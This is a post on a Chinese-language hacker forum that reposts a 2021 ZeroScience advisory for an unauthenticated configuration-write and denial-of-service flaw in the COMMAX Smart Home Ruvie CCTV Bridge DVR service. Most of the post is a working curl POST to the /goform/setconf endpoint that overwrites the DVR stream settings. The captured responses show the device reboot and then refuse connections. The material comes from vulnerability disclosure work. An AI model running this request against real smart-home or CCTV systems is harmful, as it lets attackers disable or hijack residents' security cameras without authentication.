跳转到帖子
  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

COMMAX Smart Home Ruvie CCTV Bridge DVR Service - Config Write / DoS (Unauthenticated)


HACK1949

推荐的帖子

# Exploit Title: COMMAX Smart Home Ruvie CCTV Bridge DVR Service - Config Write / DoS (Unauthenticated)
# Date: 02.08.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.commax.com

COMMAX Smart Home Ruvie CCTV Bridge DVR Service Unauthenticated Config Write / DoS


Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: n/a

Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment
complex that provides advanced life values and safety.

Desc: The application allows an unauthenticated attacker to change the configuration
of the DVR arguments and/or cause denial-of-service scenario through the setconf endpoint.

Tested on: GoAhead-Webs


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5666
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5666.php


02.08.2021

--


#1

$ curl -X POST http://192.168.1.1:8086/goform/setconf --data"manufacturer=Commax&Ch0=0&dvr0=rtsp%3A%2F%2Fadmin%3A1234zeroscience.mk%3A554%2FStream%2FCh01%3A554&dvr1=&dvr2=&dvr3=&dvr4=&dvr5=&dvr6=&dvr7=&dvr8=&dvr9=&dvr10=&dvr11=&dvr12=&dvr13=&dvr14=&dvr15=&dvr16=&dvr17=&dvr18=&dvr19=&dvr20=&dvr21=&dvr22=&dvr23=&ok=OK"

*   Trying 192.168.1.1...
* TCP_NODELAY set
* Connected to 192.168.1.1 (192.168.1.1) port 8086 (#0)
> POST /goform/setconf HTTP/1.1
> Host: 192.168.1.1:8086
> User-Agent: curl/7.55.1
> Accept: */*
> Content-Length: 257
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 257 out of 257 bytes
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Server: GoAhead-Webs
< Pragma: no-cache
< Cache-control: no-cache
< Content-Type: text/html
<
<html>
<br><br><center><table><tr><td>Completed to change configuration! Restart in 10 seconds</td></tr></table></center></body></html>
* Closing connection 0

#2

$ curl -v http://192.168.1.1:8086
* Rebuilt URL to: http://192.168.1.1:8086/
*   Trying 192.168.1.1...
* TCP_NODELAY set
* connect to 192.168.1.1 port 8086 failed: Connection refused
* Failed to connect to 192.168.1.1 port 8086: Connection refused
* Closing connection 0
curl: (7) Failed to connect to 192.168.1.1 port 8086: Connection refused
            
链接帖子
意见的链接
分享到其他网站

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    • 最近浏览   0位会员

      • 没有会员查看此页面。
    ×
    ×
    • 创建新的...